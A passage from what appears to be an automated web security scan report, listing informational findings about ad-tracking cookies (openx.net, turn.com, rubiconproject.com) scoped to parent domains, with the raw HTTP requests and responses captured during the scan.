Set-Cookie: rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%263672%3D12881%2C0%2C1%2C7%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C0%2C2%2C%2C; expires=Sun, 24-Jul-2011 17:04:28 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2132=E3F32BD05A8DDF4D5646D79640088B; expires=Sat, 23-Jun-2012 17:04:28 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.37. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=2be5fb6c-c0d8-147f-d80c-480b0a7b0393&rtb=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1308190406; i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:27 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Sun, 23-Jun-2013 17:04:27 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.38. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=D_F1HyIlEt90XWOwBLOFNrAiPk8Ac4qydps8iNraMEKDvodA_sbW8c2JnlV_mybf1n-tmlhhoYFMuRzx0bELYA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://everquest2.com/free_to_play
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=o4ZhYxPJ2Pw5XfvbQhsaFpDfbEnc9w-vODw3bflONElh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCaeoKEGWRrYa1j0O8IgD5vMnwFS7HtMXofNHrftsH-bKaR7vykJ4G_blnocTkHaMlPW77G4xQCEJUEws-BatYXJ6IYC8WBTQX8bUUIXmPY-LZw3JJMkqx51w1pR2YtuCpq6FZW9ee6pqepxcDrSlSmqIMYGmHJG75FIrenYIGOYR5O0czW-xR8eItR9Et5IZyk-3dtU8NWxmwQveYnMRjYK7u1KunjyAhI4wjE-uujeSVGDu5X63VUZQiL9158oTLi4YKJ8H0IRHnj6n6s75qKvM_F4QDFXNXDASdDuX36Wkzp15bX7OJQXizqFWPuRMtGo3I48fCleB9QRLmssYnqhwVp1d1lcuv8Oi-bAzofc8JKSrpSfruct-wsYLh-MTRC22HhlIXg-C3QmlQPe2jan2qzWIFcW73-ffTz4aBpEcHMJy0LW8k-xOEVdrjWU9Du1zMeHAy7ZZoSm8iv5WlzLijE8Sr5GgLBM0V_efj8wkT0pwQwhdI7QCRTHyjVkbrJq_P48i1E6YSPriW57bBIAv4IzT6zG86PBT5DByM8URH6aMpx3xlY8nTvgssFknIvh_X9bzHYS-B9LdlbAgcLLdD37vgtqknSg2EWl8FZYzTR7vykJ4G_blnocTkHaMlPYcsVEyjwEavPZ1IOQB-k76IYC8WBTQX8bUUIXmPY-LZOAc3GkX-Xd6ueK8RLrApqcNXPoKSnz19gf43sN51hM0MYGmHJG75FIrenYIGOYR5sK2sI9UrBz0jKXQxWnwAHe3dtU8NWxmwQveYnMRjYK5roYtEm1m2ljA5TnK4b-ETzYtUd86s7MhdQdfuW2QJ-O9qBflBAlKfYsj0c9fffeCHkZfYN0i6ORTQwcAoE_bXp15bX7OJQXizqFWPuRMtGst8JIuCgxLilohaEpCojUhvsDM2i9ZkSeodg2n84FubH8xw0gLkNMgYofMuPt-PkO8T0cGKn4uRx4CMmEsBWiKqzWIFcW73-ffTz4aBpEcHFs6L3zNdz5ZjoOzvPQTfb835UBdTu1PnDKNhFUbfz_4bftaK-dcMAPf-7IWagRhOwZr_Z_WRhdQvL8CTs4JYMK_P48i1E6YSPriW57bBIAukpN8NUt-_Qle288Cz3gyRLJfQW9W423bNMd7giheysbXds6tq7dVAQSvAX_f_7sdXQLEl7c5RtdI6fIas1hLmR7vykJ4G_blnocTkHaMlPf6EzPEWOsOXwfj5fQxhr_GIYC8WBTQX8bUUIXmPY-LZhNX08PCC1AA7AyxwLL3zQuBx6dhirOES5Nb1eoO8ppIMYGmHJG75FIrenYIGOYR5vPsApCsV7LwfVDjW_3mDwgxgaYckbvkUit6dggY5hHmRvPUTVUGpkj-QsuiT06jI7d21Tw1bGbBC95icxGNgrvI8sTlfLiUVirVDHB_PLB3B7dLv8mQai9FqZxhT-hpTl-Vx6Wg5mtI-fW_MsrYoi_G937R2K7HfGbS1pD2qdcOnXltfs4lBeLOoVY-5Ey0aGA-3n6D_561g-DmvDpQzUlnrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6EREEPS8RoGZCwLoPdHLH_1_KrNYgVxbvf599PPhoGkRwfnOHjpvtkzSEl4d-wdumAAceRGHz-2NrTvKdg0ajpYMtRTvb1kIdd3t20BSfIvd2lR7INwxHtn1BHnDvA-Z2YBr8_jyLUTphI-uJbntsEgC40HfGMMs5mhycnLkZacVec5BRFaFQeeKtoiQ2ejjL3t_kvLTuGDqhWfDkMq3m37HLQ6_3tKFpdfm7OKds5BK7lHu_KQngb9uWehxOQdoyU9DVTnKf4h_4wFcB-MHxcwQ4hgLxYFNBfxtRQheY9j4tnUR_l5Brxo2KRun1gRg513r3ZIOVck9DhuO6-IqSFo3gxgaYckbvkUit6dggY5hHk7xWvxGLYUnQUrfHnC2Gqe7d21Tw1bGbBC95icxGNgrqXK0KyGesFe6hp6T2h-gtTTHNROdRJkLW60A5ndHmAPhgonwfQhEeePqfqzvmoq8_lBesygiIexbjc4i-o7dvenXltfs4lBeLOoVY-5Ey0a54agTyYUq_bAlM32IeJPP1nrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6ER24q8YARiXvoueVF-B0Y7g6rNYgVxbvf599PPhoGkRwfdcxy6ywBRL0NjuPNLjyQkIkVHFILGNxnKUUZcH3JqRMh7s8KySk9WZWXmyLhGVZrs1C9m3PofcnmLKlVpgqYp9o6yvy84eluGVbohcnU12x7ZGYBjzf2udup-eHNa_Z2l9TAOlxk6MdeH2Q0QN4u8lwEjJzCAh1JYBH_NCxDWLbRgPNRTtLafwg9EA77wPIbJK2DjVNxAKeXIyhPIlCfc2QcZO8j6n47WVoKyeRrwcQGp1RlCeoRdbDS-DCdBrizXyhwoKg_Jo1APlrFxO5Qk18ocKCoPyaNQD5axcTuUJJH99Vdy7-581u2dx9OI_4HSK4Sdj5ZIO--EDaPhCReB0iuEnY-WSDvvhA2j4QkXgSVUeVLhXuLgjvBuZxgQvSw11T9tbDb-gupP-B4n2vxWNdU_bWw2_oLqT_geJ9r8VkGGD6sgfruhLxbvILRkdNlBhg-rIH67oS8W7yC0ZHTZKfRWXpUe2qeTc9JXMrn9VebJJoszGDQ3Eaexwt4cZZnUf20A3lCmjUuR-61VCX-NvU4nZmT5VF5Zn8llrbxzhrIPwEo3vkVRKHPopqx1EXu9w1q2IoQvSKH3wx5RmjqUvcNatiKEL0ih98MeUZo6lP2y8DrZPXMQA47HQ2Q16DsjEvzTmFPT5iAsrcfOLHBZIxL805hT0-YgLK3HzixwWTSa5W4FegvUpGyjvuJ6ISMoqk7YbtQbg4XBUuKMramGKKpO2G7UG4OFwVLijK2phoX8bz27oRd3gSS6KBPjreNNE1kZitqao1cu52aL_QsOTRNZGYramqNXLudmi_0LDk0TWRmK2pqjVy7nZov9Cw4rvuDFraCo_Irvttq09dSPZOg_D4rinflq6mkPppcy6WToPw-K4p35auppD6aXMulk6D8PiuKd-WrqaQ-mlzLphlGpNv9ySx5Y5purEM9X4YcjuFEJGiw-vacCiCpLSdSHI7hRCRosPr2nAogqS0nUhyO4UQkaLD69pwKIKktJ1NCbbhlIiub2GEITxbR40HbQm24ZSIrm9hhCE8W0eNB29dWr6tv75cpLr2rKDGkGO3Qb3R2V5rwcL9Xr_UowWOh0G90dlea8HC_V6_1KMFjodBvdHZXmvBwv1ev9SjBY6EMYtI4wwQkC7G7iE0RNYtRDGLSOMMEJAuxu4hNETWLUQxi0jjDBCQLsbuITRE1i1P36QK_2LIj8IKz8yMZslPduDWDlSILalHR2_729wlJWbg1g5UiC2pR0dv-9vcJSVm4NYOVIgtqUdHb_vb3CUlaget-adSpZ90cEnqTFdoWvEzGF1_8IOlgq7Oe0jPdomO2tcbi2u9EDm-HhlRVfdZU; fc=U63FSbWkuQ-6Ehv_rHNvdi3zAlciDD1979_v8BQ05hrif4ZYhbsuYcnc3E8aiw7N0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnO8MiwtslG4QC6vJ2mX9tHFSgQ0O9mROJGoCL9gdek9ttRbI5dYkL5pqtEW6ywS8ZDwwSRX2lC4Qe-JwlhlCZWTw_zLWP1yseKkJfFCIGqWZ; pf=wUs3RJjrnHBGmoPKC2w1BSzahta4gd-h8vP4oQlAWBgStJHO4dSC7tcSjJ5dCIRN8otVVKbFPjeNTxIiX5ySOUqurdpBdA7aDRpJC66X22yIHFm0S0kHxvLP_MYOfXLQq-dHAl-abYU1X5bYp5n9CSBwbmS48Uljm8MNWJG0d45yqi9mVjA02NuqavQ6eQd_y_Nxu2TdlUTz31ahRlm2jPXSJEnzjwmCJ-ww7TyzMnW_D1Ycf85DI0aXnqcS-yYhrNze5mJSmFU_16iWg6qGXaslDVv0CEp6k0oxMtW5frkHxEQfWMRgFYDLU3__ZDn7GKhK_pbP_UBUvvBV4z0YcGVGnrhJgXnNyT8YxkkLqook3V-8aWQ5ogo6xIv_g-tlU41tEj6SOLoKbZtcPAoWvIZNSZlGi5_0oLVgGgqWSLjIumXKNgQi-6kDQjunCLT7fjwUoJhpAG-BIBpu1eL5-lDKNc4L8lxhmJCi0XSQieFhFwq7SaNdz_ocTatUAU-qEFDSOVOmzcXCrTh-KvrBNQnMcpeUOVFqdnEJkJDKTqW5CyjQ9CWSKcOGeQNIGZUPNsclUfoCKs_P08jgwSgJYbcIxoWpLP8kJHirQfhJM1m92s9xXr05DIv8cqx6xYqZz2pyniL4I0AFr11avteCTHP-MKrmQGILwqOPUURxPh_OaB7pgTaF4qWQ2HhJHM7MQ1FATrIPe9fO1W-kVj41FzAInC6SN2fmozOFzLuTgF9cmu2fgg-ptDZq0nhZGPUq7ENa4utBAijkMB8acerWmKUiG3NKxRUIkdkWSlkGWLmKvSfxSVUhBehZqqkXgkvNStUBXiPiubepGWTwbovBGpJUJQLVBqLanOblkHJu9xH3GDUUM_ZOcJx6Ga7Je7zMcY_QS925sh7URWgzYJaPWjRgkXleqqVT1LQZLlwfgGNcyBeVzRUxv3Q7asCZPWvJx5xGZTqtRs2xUNiSflAsSHFST6QiOZR468XMdu_IjTAaJdutfTchePMF9BJE48SVs2eS74sZWCAm9rPc1kIbbk-pKbU4KtSl-ktr55_QkH3ovtrh5jGpi8fiId0xkxWG1vbbopJLM8C9at-8yKvEqAR567tiTDPDC5AioBKZ_aEJX4PLxtPJDTh6LcF4_fx6l369zx79lO56qpsZFi6-Icne4cLOSJ3coSRqSfAxlRzGjU4Tn7VESa-w2mjoF9vwj15O7a79JjYY5qVgXc2osU2kYjIqQf2_6LnQaqKT-Pb0XaBOKdel8lyMk_dn1RYgFGIEDJrpUW62qucYCD2LJczkpLARLMKPKWRScvsz04-jesN4QzQjQFlP0J6VZDJFHmaXa4eb8PMHp0xhQcCR4bqZL9BkxhlgtnxOXWCzQELeIBJUJspLAB50oC31fGkON-rRU7eE4QzN3Cj6YpqHXvt8xLb-TJA3MW3gWM8oadZrihclDcMg24IQ1mssSMoGnSi5oFPpM3C1T95FgaV2FhfNZ-wWSAoC-ekqRlbYKilgrqOhS_hzDUPsZfBJd2FhVACj21yYaTIGE8VBZkwZ0hQ6Ladu7PughH-bIm4y0Ab6nRgUKcGXElGE-_DS4Ricu2NP8QQUwEddIGGXiI0ikX8tIMOHu7ZzFVt755dCSQZs-k9i-tjPDbhaQ0YI__sTf8igRaY5cyCnjyOwVD2OS00